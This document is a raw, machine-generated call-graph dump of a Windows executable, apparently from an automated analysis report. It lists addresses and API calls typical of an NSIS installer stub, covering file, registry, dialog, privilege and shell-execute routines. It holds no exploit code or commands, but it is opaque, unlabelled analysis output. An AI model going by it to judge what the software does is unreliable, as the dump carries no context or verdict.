405d74 GetFileAttributesW CreateFileW 3996->4014 3998 405f76 3998->3989 3999 405f85 GetFileSize GlobalAlloc 3998->3999 4000 405fa7 3999->4000 4001 40603c CloseHandle 3999->4001 4015 405df7 ReadFile 4000->4015 4001->3989 4006 405fc6 lstrcpyA 4009 405fe8 4006->4009 4007 405fda 4008 405cd9 4 API calls 4007->4008 4008->4009 4010 40601f SetFilePointer 4009->4010 4022 405e26 WriteFile 4010->4022 4013->3993 4014->3998 4016 405e15 4015->4016 4016->4001 4017 405cd9 lstrlenA 4016->4017 4018 405d1a lstrlenA 4017->4018 4019 405d22 4018->4019 4020 405cf3 lstrcmpiA 4018->4020 4019->4006 4019->4007 4020->4019 4021 405d11 CharNextA 4020->4021 4021->4018 4023 405e44 GlobalFree 4022->4023 4023->4001 4024 4015c1 4025 402c37 17 API calls 4024->4025 4026 4015c8 4025->4026 4027 405bfe 4 API calls 4026->4027 4039 4015d1 4027->4039 4028 401631 4029 401663 4028->4029 4030 401636 4028->4030 4034 401423 24 API calls 4029->4034 4051 401423 4030->4051 4031 405b80 CharNextW 4031->4039 4040 40165b 4034->4040 4038 40164a SetCurrentDirectoryW 4038->4040 4039->4028 4039->4031 4041 401617 GetFileAttributesW 4039->4041 4043 40584f 4039->4043 4046 4057b5 CreateDirectoryW 4039->4046 4055 405832 CreateDirectoryW 4039->4055 4041->4039 4058 40665c GetModuleHandleA 4043->4058 4047 405802 4046->4047 4048 405806 GetLastError 4046->4048 4047->4039 4048->4047 4049 405815 SetFileSecurityW 4048->4049 4049->4047 4050 40582b GetLastError 4049->4050 4050->4047 4052 4052e6 24 API calls 4051->4052 4053 401431 4052->4053 4054 406282 lstrcpynW 4053->4054 4054->4038 4056 405846 GetLastError 4055->4056 4057 405842 4055->4057 4056->4057 4057->4039 4059 406682 GetProcAddress 4058->4059 4060 406678 4058->4060 4063 405856 4059->4063 4064 4065ec GetSystemDirectoryW 4060->4064 4062 40667e 4062->4059 4062->4063 4063->4039 4065 40660e wsprintfW LoadLibraryExW 4064->4065 4065->4062 4180 401e43 4188 402c15 4180->4188 4182 401e49 4183 402c15 17 API calls 4182->4183 4184 401e55 4183->4184 4185 401e61 ShowWindow 4184->4185 4186 401e6c EnableWindow 4184->4186 4187 402abf 4185->4187 4186->4187 4189 4062a4 17 API calls 4188->4189 4190 402c2a 4189->4190 4190->4182 4191 402644 4192 402c15 17 API calls 4191->4192 4200 402653 4192->4200 4193 402790 4194 40269d ReadFile 4194->4193 4194->4200 4195 402736 4195->4193 4195->4200 4205 405e55 SetFilePointer 4195->4205 4196 405df7 ReadFile 4196->4200 4198 402792 4214 4061c9 wsprintfW 4198->4214 4199 4026dd MultiByteToWideChar 4199->4200 4200->4193 4200->4194 4200->4195 4200->4196 4200->4198 4200->4199 4202 402703 SetFilePointer MultiByteToWideChar 4200->4202 4203 4027a3 4200->4203 4202->4200 4203->4193 4204 4027c4 SetFilePointer 4203->4204 4204->4193 4206 405e71 4205->4206 4211 405e8d 4205->4211 4207 405df7 ReadFile 4206->4207 4208 405e7d 4207->4208 4209 405e96 SetFilePointer 4208->4209 4210 405ebe SetFilePointer 4208->4210 4208->4211 4209->4210 4212 405ea1 4209->4212 4210->4211 4211->4195 4213 405e26 WriteFile 4212->4213 4213->4211 4214->4193 4225 402348 4226 402c37 17 API calls 4225->4226 4227 402357 4226->4227 4228 402c37 17 API calls 4227->4228 4229 402360 4228->4229 4230 402c37 17 API calls 4229->4230 4231 40236a GetPrivateProfileStringW 4230->4231 4950 4016cc 4951 402c37 17 API calls 4950->4951 4952 4016d2 GetFullPathNameW 4951->4952 4953 40170e 4952->4953 4954 4016ec 4952->4954 4955 401723 GetShortPathNameW 4953->4955 4956 402abf 4953->4956 4954->4953 4957 4065c5 2 API calls 4954->4957 4955->4956 4958 4016fe 4957->4958 4958->4953 4960 406282 lstrcpynW 4958->4960 4960->4953 4961 401b4d 4962 402c37 17 API calls 4961->4962 4963 401b54 4962->4963 4964 402c15 17 API calls 4963->4964 4965 401b5d wsprintfW 4964->4965 4966 402abf 4965->4966 4967 40394e 4968 403959 4967->4968 4969 403960 GlobalAlloc 4968->4969 4970 40395d 4968->4970 4969->4970 4971 401f52 4972 402c37 17 API calls 4971->4972 4973 401f59 4972->4973 4974 4065c5 2 API calls 4973->4974 4975 401f5f 4974->4975 4977 401f70 4975->4977 4978 4061c9 wsprintfW 4975->4978 4978->4977 4979 402253 4980 402c37 17 API calls 4979->4980 4981 402259 4980->4981 4982 402c37 17 API calls 4981->4982 4983 402262 4982->4983 4984 402c37 17 API calls 4983->4984 4985 40226b 4984->4985 4986 4065c5 2 API calls 4985->4986 4987 402274 4986->4987 4988 402285 lstrlenW lstrlenW 4987->4988 4992 402278 4987->4992 4989 4052e6 24 API calls 4988->4989 4991 4022c3 SHFileOperationW 4989->4991 4990 4052e6 24 API calls 4993 402280 4990->4993 4991->4992 4991->4993 4992->4990 4994 401956 4995 402c37 17 API calls 4994->4995 4996 40195d lstrlenW 4995->4996 4997 40258c 4996->4997 4998 4014d7 4999 402c15 17 API calls 4998->4999 5000 4014dd Sleep 4999->5000 5002 402abf 5000->5002 5003 4022d7 5004 4022de 5003->5004 5008 4022f1 5003->5008 5005 4062a4 17 API calls 5004->5005 5006 4022eb 5005->5006 5007 4058e4 MessageBoxIndirectW 5006->5007 5007->5008 5009 401d57 GetDlgItem GetClientRect 5010 402c37 17 API calls 5009->5010 5011 401d89 LoadImageW SendMessageW 5010->5011 5012 401da7 DeleteObject 5011->5012 5013 402abf 5011->5013 5012->5013 5014 402dd7 5015 402e02 5014->5015 5016 402de9 SetTimer 5014->5016 5017 402e57 5015->5017 5018 402e1c MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5015->5018 5016->5015 5018->5017 4798 40525a 4799 40526a 4798->4799 4800 40527e 4798->4800 4801 405270 4799->4801 4811 4052c7 4799->4811 4802 405286 IsWindowVisible 4800->4802 4806 4052a6 4800->4806 4804 404263 SendMessageW 4801->4804 4805 405293 4802->4805 4802->4811 4803 4052cc CallWindowProcW 4807 40527a 4803->4807 4804->4807 4808 404bb0 5 API calls 4805->4808 4806->4803 4810 404c30 4 API calls 4806->4810 4809 40529d 4808->4809 4809->4806 4810->4811 4811->4803 4812 40175c 4813 402c37 17 API calls 4812->4813 4814 401763 4813->4814 4815 405da3 2 API calls 4814->4815 4816 40176a 4815->4816 4817 405da3 2 API calls 4816->4817 4817->4816 4818 4023de 4819 402c37 17 API calls 4818->4819 4820 4023f0 4819->4820 4821 402c37 17 API calls 4820->4821 4822 4023fa 4821->4822 4835 402cc7 4822->4835 4825 402432 4828 40243e 4825->4828 4829 402c15 17 API calls 4825->4829 4826 402885 4827 402c37 17 API calls 4831 402428 lstrlenW 4827->4831 4830 40245d RegSetValueExW 4828->4830 4832 4030fa 31 API calls 4828->4832 4829->4828 4833 402473 RegCloseKey 4830->4833 4831->4825 4832->4830 4833->4826 4836 402ce2 4835->4836 4839 40611d 4836->4839 4840 40612c 4839->4840 4841 40240a 4840->4841 4842 406137 RegCreateKeyExW 4840->4842 4841->4825 4841->4826 4841->4827 4842->4841 4067 404c62 GetDlgItem GetDlgItem 4068 404cb4 7 API calls 4067->4068 4076 404ecd 4067->4076 4069 404d57 DeleteObject 4068->4069 4070 404d4a SendMessageW 4068->4070 4071 404d60 4069->4071 4070->4069 4072 404d6f 4071->4072 4073 404d97 4071->4073 4074 4062a4 17 API calls 4072->4074 4123 404217 4073->4123 4079 404d79 SendMessageW SendMessageW 4074->4079 4075 404f92 4085 404fb1 4075->4085 4087 404fa3 SendMessageW 4075->4087 4076->4075 4082 404f2d 4076->4082 4076->4085 4078 40505d 4080 405067 SendMessageW 4078->4080 4081 40506f 4078->4081 4079->4071 4080->4081 4092 405081 ImageList_Destroy 4081->4092 4093 405088 4081->4093 4103 405098 4081->4103 4128 404bb0 SendMessageW 4082->4128 4083 404dab 4089 404217 18 API calls 4083->4089 4084 405245 4145 40427e 4084->4145 4085->4078 4085->4084 4090 40500a SendMessageW 4085->4090 4087->4085 4109 404db9 4089->4109 4090->4084 4094 40501f SendMessageW 4090->4094 4092->4093 4096 405091 GlobalFree 4093->4096 4093->4103 4098 405032 4094->4098 4095 405207 4095->4084 4099 405219 ShowWindow GetDlgItem ShowWindow 4095->4099 4096->4103 4097 404e8e GetWindowLongW SetWindowLongW 4100 404ea7 4097->4100 4104 405043 SendMessageW 4098->4104 4099->4084 4101 404ec5 4100->4101 4102 404ead ShowWindow 4100->4102 4127 40424c SendMessageW 4101->4127 4126 40424c SendMessageW 4102->4126 4103->4095 4118 4050d3 4103->4118 4133 404c30 4103->4133 4104->4078 4105 404e88 4105->4097 4105->4100 4108 404f3e 4108->4075 4109->4097 4109->4105 4110 404e09 SendMessageW 4109->4110 4111 404e45 SendMessageW 4109->4111 4112 404e56 SendMessageW 4109->4112 4110->4109 4111->4109 4112->4109 4114 404ec0 4114->4084 4115 4051dd InvalidateRect 4115->4095 4116 4051f3 4115->4116 4142 404b6b 4116->4142 4117 405101 SendMessageW 4119 405117 4117->4119 4118->4117 4118->4119 4119->4115 4120 405178 4119->4120 4122 40518b SendMessageW SendMessageW 4119->4122 4120->4122 4122->4119 4124 4062a4 17 API calls 4123->4124 4125 404222 SetDlgItemTextW 4124->4125 4125->4083 4126->4114 4127->4076 4129 404bd3 GetMessagePos ScreenToClient SendMessageW 4128->4129 4130 404c0f SendMessageW 4128->4130 4131 404c07 4129->4131 4132 404c0c 4129->4132 4130->4131 4131->4108 4132->4130 4159 406282 lstrcpynW 4133->4159 4135 404c43 4160 4061c9 wsprintfW 4135->4160 4137 404c4d 4161 40140b 4137->4161 4141 404c5d 4141->4118 4169 404aa2 4142->4169 4144 404b80 4144->4095 4146 404296 GetWindowLongW 4145->4146 4147 40431f 4145->4147 4146->4147 4148 4042a7 4146->4148 4149 4042b6 GetSysColor 4148->4149 4150 4042b9 4148->4150 4149->4150 4151 4042c9 SetBkMode 4150->4151 4152 4042bf SetTextColor 4150->4152 4153 4042e1 GetSysColor 4151->4153 4154 4042e7 4151->4154 4152->4151 4153->4154 4155 4042f8 4154->4155 4156 4042ee SetBkColor 4154->4156 4155->4147 4157 404312 CreateBrushIndirect 4155->4157 4158 40430b DeleteObject 4155->4158 4156->4155 4157->4147 4158->4157 4159->4135 4160->4137 4165 401389 4161->4165 4164 406282 lstrcpynW 4164->4141 4167 401390 4165->4167 4166 4013fe 4166->4164 4167->4166 4168 4013cb MulDiv SendMessageW 4167->4168 4168->4167 4172 404abb 4169->4172 4170 4062a4 17 API calls 4171 404b1f 4170->4171 4173 4062a4 17 API calls 4171->4173 4172->4170 4174 404b2a 4173->4174 4175 4062a4 17 API calls 4174->4175 4176 404b40 lstrlenW wsprintfW SetDlgItemTextW 4175->4176 4176->4144 5019 402862 5020 402c37 17 API calls 5019->5020 5021 402869 FindFirstFileW 5020->5021 5022 402891 5021->5022 5023 40287c 5021->5023 5027 4061c9 wsprintfW 5022->5027 5025 40289a 5028 406282 lstrcpynW 5025->5028 5027->5025 5028->5023 5029 401563 5030 402a65 5029->5030 5033 4061c9 wsprintfW 5030->5033 5032 402a6a 5033->5032 5034 404365 lstrlenW 5035 404384 5034->5035 5036 404386 WideCharToMultiByte 5034->5036 5035->5036 5037 4046e6 5038 404712 5037->5038 5039 404723 5037->5039 5098 4058c8 GetDlgItemTextW 5038->5098 5040 40472f GetDlgItem 5039->5040 5043 40478e 5039->5043 5042 404743 5040->5042 5047 404757 SetWindowTextW 5042->5047 5050 405bfe 4 API calls 5042->5050 5044 404872 5043->5044 5052 4062a4 17 API calls 5043->5052 5096 404a21 5043->5096 5044->5096 5100 4058c8 GetDlgItemTextW 5044->5100 5045 40471d 5046 406516 5 API calls 5045->5046 5046->5039 5051 404217 18 API calls 5047->5051 5049 40427e 8 API calls 5054 404a35 5049->5054 5055 40474d 5050->5055 5056 404773 5051->5056 5057 404802 SHBrowseForFolderW 5052->5057 5053 4048a2 5058 405c5b 18 API calls 5053->5058 5055->5047 5061 405b53 3 API calls 5055->5061 5059 404217 18 API calls 5056->5059 5057->5044 5060 40481a CoTaskMemFree 5057->5060 5064 4048a8 5058->5064 5062 404781 5059->5062 5063 405b53 3 API calls 5060->5063 5061->5047 5099 40424c SendMessageW 5062->5099 5066 404827 5063->5066 5101 406282 lstrcpynW 5064->5101 5069 40485e SetDlgItemTextW 5066->5069 5073 4062a4 17 API calls 5066->5073 5068 404787 5072 40665c 5 API calls 5068->5072 5069->5044 5070 4048bf 5071 40665c 5 API calls 5070->5071 5079 4048c6 5071->5079 5072->5043 5074 404846 lstrcmpiW 5073->5074 5074->5069 5076 404857 lstrcatW 5074->5076 5075 404907 5102 406282 lstrcpynW 5075->5102 5076->5069 5078 40490e 5080 405bfe 4 API calls 5078->5080 5079->5075 5084 405b9f 2 API calls 5079->5084 5085 40495f 5079->5085 5081 404914 GetDiskFreeSpaceW 5080->5081 5083 404938 MulDiv 5081->5083 5081->5085 5083->5085 5084->5079 5086 4049d0 5085->5086 5088 404b6b 20 API calls 5085->5088 5087 4049f3 5086->5087 5089 40140b 2 API calls 5086->5089 5103 404239 EnableWindow 5087->5103 5090 4049bd 5088->5090 5089->5087 5091 4049d2 SetDlgItemTextW 5090->5091 5092 4049c2 5090->5092 5091->5086 5094 404aa2 20 API calls 5092->5094 5094->5086 5095 404a0f 5095->5096 5104 40463f 5095->5104 5096->5049 5098->5045 5099->5068 5100->5053 5101->5070 5102->5078 5103->5095 5105 404652 SendMessageW 5104->5105 5106 40464d 5104->5106 5105->5096 5106->5105 5107 401968 5108 402c15 17 API calls 5107->5108 5109 40196f 5108->5109 5110 402c15 17 API calls 5109->5110 5111 40197c 5110->5111 5112 402c37 17 API calls 5111->5112 5113 401993 lstrlenW 5112->5113 5114 4019a4 5113->5114 5118 4019e5 5114->5118 5119 406282 lstrcpynW 5114->5119 5116 4019d5 5117 4019da lstrlenW 5116->5117 5116->5118 5117->5118 5119->5116 4266 4027e9 4267 4027f0 4266->4267 4269 402a6a 4266->4269 4268 402c15 17 API calls 4267->4268 4270 4027f7 4268->4270 4271 402806 SetFilePointer 4270->4271 4271->4269 4272 402816 4271->4272 4274 4061c9 wsprintfW 4272->4274 4274->4269 5120 100018a9 5121 100018cc 5120->5121 5122 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5121->5122 5123 100018ff GlobalFree 5121->5123 5124 10001272 2 API calls 5122->5124 5123->5122 5125 10001a87 GlobalFree GlobalFree 5124->5125 5126 40166a 5127 402c37 17 API calls 5126->5127 5128 401670 5127->5128 5129 4065c5 2 API calls 5128->5129 5130 401676 5129->5130 5131 401ced 5132 402c15 17 API calls 5131->5132 5133 401cf3 IsWindow 5132->5133 5134 401a20 5133->5134 4458 40176f 4459 402c37 17 API calls 4458->4459 4460 401776 4459->4460 4461 401796 4460->4461 4462 40179e 4460->4462 4518 406282 lstrcpynW 4461->4518 4519 406282 lstrcpynW 4462->4519 4465 40179c 4468 406516 5 API calls 4465->4468 4466 4017a9 4467 405b53 3 API calls 4466->4467 4469 4017af lstrcatW 4467->4469 4486 4017bb 4468->4486 4469->4465 4470 4065c5 2 API calls 4470->4486 4471 4017f7 4472 405d4f 2 API calls 4471->4472 4472->4486 4474 4017cd CompareFileTime 4474->4486 4475 40188d 4476 4052e6 24 API calls 4475->4476 4478 401897 4476->4478 4477 401864 4479 4052e6 24 API calls 4477->4479 4496 401879 4477->4496 4498 4030fa 4478->4498 4479->4496 4480 406282 lstrcpynW 4480->4486 4483 4018be SetFileTime 4485 4018d0 CloseHandle 4483->4485 4484 4062a4 17 API calls 4484->4486 4487 4018e1 4485->4487 4485->4496 4486->4470 4486->4471 4486->4474 4486->4475 4486->4477 4486->4480 4486->4484 4497 405d74 GetFileAttributesW CreateFileW 4486->4497 4520 4058e4 4486->4520 4488 4018e6 4487->4488 4489 4018f9 4487->4489 4490 4062a4 17 API calls 4488->4490 4491 4062a4 17 API calls 4489->4491 4493 4018ee lstrcatW 4490->4493 4494 401901 4491->4494 4493->4494 4495 4058e4 MessageBoxIndirectW 4494->4495 4495->4496 4497->4486 4500 403113 4498->4500 4499 403141 4524 403315 4499->4524 4500->4499 4527 40332b SetFilePointer 4500->4527 4504 4032ae 4506 4032f0 4504->4506 4507 4032b2 4504->4507 4505 40315e GetTickCount 4510 4018aa 4505->4510 4517 4031ad 4505->4517 4508 403315 ReadFile 4506->4508 4507->4510 4511 403315 ReadFile 4507->4511 4512 405e26 WriteFile 4507->4512 4508->4510 4509 403315 ReadFile 4509->4517 4510->4483 4510->4485 4511->4507 4512->4507 4513 403203 GetTickCount 4513->4517 4514 403228 MulDiv wsprintfW 4515 4052e6 24 API calls 4514->4515 4515->4517 4516 405e26 WriteFile 4516->4517 4517->4509 4517->4510 4517->4513 4517->4514 4517->4516 4518->4465 4519->4466 4521 4058f9 4520->4521 4522 405945 4521->4522 4523 40590d MessageBoxIndirectW 4521->4523 4522->4486 4523->4522 4525 405df7 ReadFile 4524->4525 4526 40314c 4525->4526 4526->4504 4526->4505 4526->4510 4527->4499 5135 402570 5136 402c37 17 API calls 5135->5136 5137 402577 5136->5137 5140 405d74 GetFileAttributesW CreateFileW 5137->5140 5139 402583 5140->5139 4528 401b71 4529 401bc2 4528->4529 4530 401b7e 4528->4530 4531 401bc7 4529->4531 4532 401bec GlobalAlloc 4529->4532 4533 401c07 4530->4533 4538 401b95 4530->4538 4542 4022f1 4531->4542 4549 406282 lstrcpynW 4531->4549 4534 4062a4 17 API calls 4532->4534 4535 4062a4 17 API calls 4533->4535 4533->4542 4534->4533 4537 4022eb 4535->4537 4541 4058e4 MessageBoxIndirectW 4537->4541 4547 406282 lstrcpynW 4538->4547 4539 401bd9 GlobalFree 4539->4542 4541->4542 4543 401ba4 4548 406282 lstrcpynW 4543->4548 4545 401bb3 4550 406282 lstrcpynW 4545->4550 4547->4543 4548->4545 4549->4539 4550->4542 5141 401a72 5142 402c15 17 API calls 5141->5142 5143 401a78 5142->5143 5144 402c15 17 API calls 5143->5144 5145 401a20 5144->5145 5146 4024f2 5147 402c77 17 API calls 5146->5147 5148 4024fc 5147->5148 5149 402c15 17 API calls 5148->5149 5150 402505 5149->5150 5151 402521 RegEnumKeyW 5150->5151 5152 40252d RegEnumValueW 5150->5152 5154 402885 5150->5154 5153 402542 RegCloseKey 5151->5153 5152->5153 5153->5154 4551 403373 SetErrorMode GetVersion 4552 4033b2 4551->4552 4553 4033b8 4551->4553 4554 40665c 5 API calls 4552->4554 4555 4065ec 3 API calls 4553->4555 4554->4553 4556 4033ce lstrlenA 4555->4556 4556->4553 4557 4033de 4556->4557 4558 40665c 5 API calls 4557->4558 4559 4033e5 4558->4559 4560 40665c 5 API calls 4559->4560 4561 4033ec 4560->4561 4562 40665c 5 API calls 4561->4562 4563 4033f8 #17 OleInitialize SHGetFileInfoW 4562->4563 4642 406282 lstrcpynW 4563->4642 4566 403444 GetCommandLineW 4643 406282 lstrcpynW 4566->4643 4568 403456 GetModuleHandleW 4569 40346e 4568->4569 4570 405b80 CharNextW 4569->4570 4571 40347d CharNextW 4570->4571 4572 4035a7 GetTempPathW 4571->4572 4580 403496 4571->4580 4644 403342 4572->4644 4574 4035bf 4575 4035c3 GetWindowsDirectoryW lstrcatW 4574->4575 4576 403619 DeleteFileW 4574->4576 4577 403342 12 API calls 4575->4577 4654 402ec1 GetTickCount GetModuleFileNameW 4576->4654 4581 4035df 4577->4581 4578 405b80 CharNextW 4578->4580 4580->4578 4586 403592 4580->4586 4588 403590 4580->4588 4581->4576 4583 4035e3 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4581->4583 4582 40362d 4584 4036e0 4582->4584 4589 4036d0 4582->4589 4594 405b80 CharNextW 4582->4594 4587 403342 12 API calls 4583->4587 4741 4038b6 4584->4741 4738 406282 lstrcpynW 4586->4738 4592 403611 4587->4592 4588->4572 4682 403990 4589->4682 4592->4576 4592->4584 4606 40364c 4594->4606 4595 40381a 4598 403822 GetCurrentProcess OpenProcessToken 4595->4598 4599 40389e ExitProcess 4595->4599 4596 4036fa 4597 4058e4 MessageBoxIndirectW 4596->4597 4603 403708 ExitProcess 4597->4603 4604 40383a LookupPrivilegeValueW AdjustTokenPrivileges 4598->4604 4605 40386e 4598->4605 4601 403710 4608 40584f 5 API calls 4601->4608 4602 4036aa 4607 405c5b 18 API calls 4602->4607 4604->4605 4609 40665c 5 API calls 4605->4609 4606->4601 4606->4602 4610 4036b6 4607->4610 4611 403715 lstrcatW 4608->4611 4612 403875 4609->4612 4610->4584 4739 406282 lstrcpynW 4610->4739 4613 403731 lstrcatW lstrcmpiW 4611->4613 4614 403726 lstrcatW 4611->4614 4615 40388a ExitWindowsEx 4612->4615 4616 403897 4612->4616 4613->4584 4618 40374d 4613->4618 4614->4613 4615->4599 4615->4616 4619 40140b 2 API calls 4616->4619 4621 403752 4618->4621 4622 403759 4618->4622 4619->4599 4620 4036c5 4740 406282 lstrcpynW 4620->4740 4625 4057b5 4 API calls 4621->4625 4623 405832 2 API calls 4622->4623 4627 40375e SetCurrentDirectoryW 4623->4627 4626 403757 4625->4626 4626->4627 4628 403779 4627->4628 4629 40376e 4627->4629 4749 406282 lstrcpynW 4628->4749 4748 406282 lstrcpynW 4629->4748 4632 4062a4 17 API calls 4633 4037b8 DeleteFileW 4632->4633 4634 4037c5 CopyFileW 4633->4634 4639 403787 4633->4639 4634->4639 4635 40380e 4636 406048 36 API calls 4635->4636 4636->4584 4637 406048 36 API calls 4637->4639 4638 4062a4 17 API calls 4638->4639 4639->4632 4639->4635 4639->4637 4639->4638 4640 405867 2 API calls 4639->4640 4641 4037f9 CloseHandle 4639->4641 4640->4639 4641->4639 4642->4566 4643->4568 4645 406516 5 API calls 4644->4645 4646 40334e 4645->4646 4647 403358 4646->4647 4648 405b53 3 API calls 4646->4648 4647->4574 4649 403360 4648->4649 4650 405832 2 API calls 4649->4650 4651 403366 4650->4651 4750 405da3 4651->4750 4754 405d74 GetFileAttributesW CreateFileW 4654->4754 4656 402f01 4675 402f11 4656->4675 4755 406282 lstrcpynW 4656->4755 4658 402f27 4659 405b9f 2 API calls 4658->4659 4660 402f2d 4659->4660 4756 406282 lstrcpynW 4660->4756 4662 402f38 GetFileSize 4663 403034 4662->4663 4681 402f4f 4662->4681 4757 402e5d 4663->4757 4665 40303d 4667 40306d GlobalAlloc 4665->4667 4665->4675 4769 40332b SetFilePointer 4665->4769 4666 403315 ReadFile 4666->4681 4768 40332b SetFilePointer 4667->4768 4670 4030a0 4672 402e5d 6 API calls 4670->4672 4671 403088 4674 4030fa 31 API calls 4671->4674 4672->4675 4673 403056 4676 403315 ReadFile 4673->4676 4679 403094 4674->4679 4675->4582 4678 403061 4676->4678 4677 402e5d 6 API calls 4677->4681 4678->4667 4678->4675 4679->4675 4679->4679 4680 4030d1 SetFilePointer 4679->4680 4680->4675 4681->4663 4681->4666 4681->4670 4681->4675 4681->4677 4683 40665c 5 API calls 4682->4683 4684 4039a4 4683->4684 4685 4039aa 4684->4685 4686 4039bc 4684->4686 4778 4061c9 wsprintfW 4685->4778 4687 406150 3 API calls 4686->4687 4688 4039ec 4687->4688 4690 403a0b lstrcatW 4688->4690 4692 406150 3 API calls 4688->4692 4691 4039ba 4690->4691 4770 403c66 4691->4770 4692->4690 4695 405c5b 18 API calls 4696 403a3d 4695->4696 4697 403ad1 4696->4697 4699 406150 3 API calls 4696->4699 4698 405c5b 18 API calls 4697->4698 4700 403ad7 4698->4700 4701 403a6f 4699->4701 4702 403ae7 LoadImageW 4700->4702 4703 4062a4 17 API calls 4700->4703 4701->4697 4706 403a90 lstrlenW 4701->4706 4710 405b80 CharNextW 4701->4710 4704 403b8d 4702->4704 4705 403b0e RegisterClassW 4702->4705 4703->4702 4709 40140b 2 API calls 4704->4709 4707 403b44 SystemParametersInfoW CreateWindowExW 4705->4707 4708 403b97 4705->4708 4711 403ac4 4706->4711 4712 403a9e lstrcmpiW 4706->4712 4707->4704 4708->4584 4713 403b93 4709->4713 4714 403a8d 4710->4714 4716 405b53 3 API calls 4711->4716 4712->4711 4715 403aae GetFileAttributesW 4712->4715 4713->4708 4719 403c66 18 API calls 4713->4719 4714->4706 4718 403aba 4715->4718 4717 403aca 4716->4717 4779 406282 lstrcpynW 4717->4779 4718->4711 4722 405b9f 2 API calls 4718->4722 4720 403ba4 4719->4720 4723 403bb0 ShowWindow 4720->4723 4724 403c33 4720->4724 4722->4711 4725 4065ec 3 API calls 4723->4725 4780 4053b9 OleInitialize 4724->4780 4730 403bc8 4725->4730 4727 403c39 4728 403c55 4727->4728 4731 403c3d 4727->4731 4732 40140b 2 API calls 4728->4732 4729 403bd6 GetClassInfoW 4734 403c00 DialogBoxParamW 4729->4734 4735 403bea GetClassInfoW RegisterClassW 4729->4735 4730->4729 4733 4065ec 3 API calls 4730->4733 4731->4708 4736 40140b 2 API calls 4731->4736 4732->4708 4733->4729 4737 40140b 2 API calls 4734->4737 4735->4734 4736->4708 4737->4708 4738->4588 4739->4620 4740->4589 4742 4038c0 CloseHandle 4741->4742 4743 4038ce 4741->4743 4742->4743 4794 4038fb 4743->4794 4746 405990 67 API calls 4747 4036e9 OleUninitialize 4746->4747 4747->4595 4747->4596 4748->4628 4749->4639 4751 405db0 GetTickCount GetTempFileNameW 4750->4751 4752 403371 4751->4752 4753 405de6 4751->4753 4752->4574 4753->4751 4753->4752 4754->4656 4755->4658 4756->4662 4758 402e66 4757->4758 4759 402e7e 4757->4759 4760 402e76 4758->4760 4761 402e6f DestroyWindow 4758->4761 4762 402e86 4759->4762 4763 402e8e GetTickCount 4759->4763 4760->4665 4761->4760 4764 406698 2 API calls 4762->4764 4765 402e9c CreateDialogParamW ShowWindow 4763->4765 4766 402ebf 4763->4766 4767 402e8c 4764->4767 4765->4766 4766->4665 4767->4665 4768->4671 4769->4673 4771 403c7a 4770->4771 4787 4061c9 wsprintfW 4771->4787 4773 403ceb 4788 403d1f 4773->4788 4775 403a1b 4775->4695 4776 403cf0 4776->4775 4777 4062a4 17 API calls 4776->4777 4777->4776 4778->4691 4779->4697 4791 404263 4780->4791 4782 4053dc 4785 401389 2 API calls 4782->4785 4786 405403 4782->4786 4783 404263 SendMessageW 4784 405415 OleUninitialize 4783->4784 4784->4727 4785->4782 4786->4783 4787->4773 4789 4062a4 17 API calls 4788->4789 4790 403d2d SetWindowTextW 4789->4790 4790->4776 4792 40427b 4791->4792 4793 40426c SendMessageW 4791->4793 4792->4782 4793->4792 4795 403909 4794->4795 4796 40390e FreeLibrary GlobalFree 4795->4796 4797 4038d3 4795->4797 4796->4796 4796->4797 4797->4746 5156 401573 5157 401583 ShowWindow 5156->5157 5158 40158c 5156->5158 5157->5158 5159 40159a ShowWindow 5158->5159 5160 402abf 5158->5160 5159->5160 5161 4014f5 SetForegroundWindow 5162 402abf 5161->5162 5163 100016b6 5164 100016e5 5163->5164 5165 10001b18 22 API calls 5164->5165 5166 100016ec 5165->5166 5167 100016f3 5166->5167 5168 100016ff 5166->5168 5171 10001272 2 API calls 5167->5171 5169 10001726 5168->5169 5170 10001709 5168->5170 5173 10001750 5169->5173 5174 1000172c 5169->5174 5172 1000153d 3 API calls 5170->5172 5175 100016fd 5171->5175 5176 1000170e 5172->5176 5178 1000153d 3 API calls 5173->5178 5177 100015b4 3 API calls 5174->5177 5179 100015b4 3 API calls 5176->5179 5180 10001731 5177->5180 5178->5175 5181 10001714 5179->5181 5182 10001272 2 API calls 5180->5182 5183 10001272 2 API calls 5181->5183 5184 10001737 GlobalFree 5182->5184 5185 1000171a GlobalFree 5183->5185 5184->5175 5186 1000174b GlobalFree 5184->5186 5185->5175 5186->5175 5187 401e77 5188 402c37 17 API calls 5187->5188 5189 401e7d 5188->5189 5190 402c37 17 API calls 5189->5190 5191 401e86 5190->5191 5192 402c37 17 API calls 5191->5192 5193 401e8f 5192->5193 5194 402c37 17 API calls 5193->5194 5195 401e98 5194->5195 5196 401423 24 API calls 5195->5196 5197 401e9f 5196->5197 5204 4058aa ShellExecuteExW 5197->5204 5199 401ee1 5200 40670d 5 API calls 5199->5200 5202 402885 5199->5202 5201 401efb CloseHandle 5200->5201 5201->5202 5204->5199 5205 10002238 5206 10002296 5205->5206 5207 100022cc 5205->5207 5206->5207 5208 100022a8 GlobalAlloc 5206->5208 5208->5206 5209 40167b 5210 402c37 17 API calls 5209->5210 5211 401682 5210->5211 5212 402c37 17 API calls 5211->5212 5213 40168b 5212->5213 5214 402c37 17 API calls 5213->5214 5215 401694 MoveFileW 5214->5215 5216 4016a0 5215->5216 5217 4016a7 5215->5217 5218 401423 24 API calls 5216->5218 5219 4065c5 2 API calls 5217->5219 5221 40224a 5217->5221 5218->5221 5220 4016b6 5219->5220 5220->5221 5222 406048 36 API calls 5220->5222 5222->5216 5223 1000103d 5224 1000101b 5 API calls 5223->5224 5225 10001056 5224->5225 4843 40247e 4844 402c77 17 API calls 4843->4844 4845 402488 4844->4845 4846 402c37 17 API calls 4845->4846 4847 402491 4846->4847 4848 40249c RegQueryValueExW 4847->4848 4851 402885 4847->4851 4849 4024c2 RegCloseKey 4848->4849 4850 4024bc 4848->4850 4849->4851 4850->4849 4854 4061c9 wsprintfW 4850->4854 4854->4849 5226 4020fe 5227 402c37 17 API calls 5226->5227 5228 402105 5227->5228 5229 402c37 17 API calls 5228->5229 5230 40210f 5229->5230 5231 402c37 17 API calls 5230->5231 5232 402119 5231->5232 5233 402c37 17 API calls 5232->5233 5234 402123 5233->5234 5235 402c37 17 API calls 5234->5235 5236 40212d 5235->5236 5237 40216c CoCreateInstance 5236->5237 5238 402c37 17 API calls 5236->5238 5241 40218b 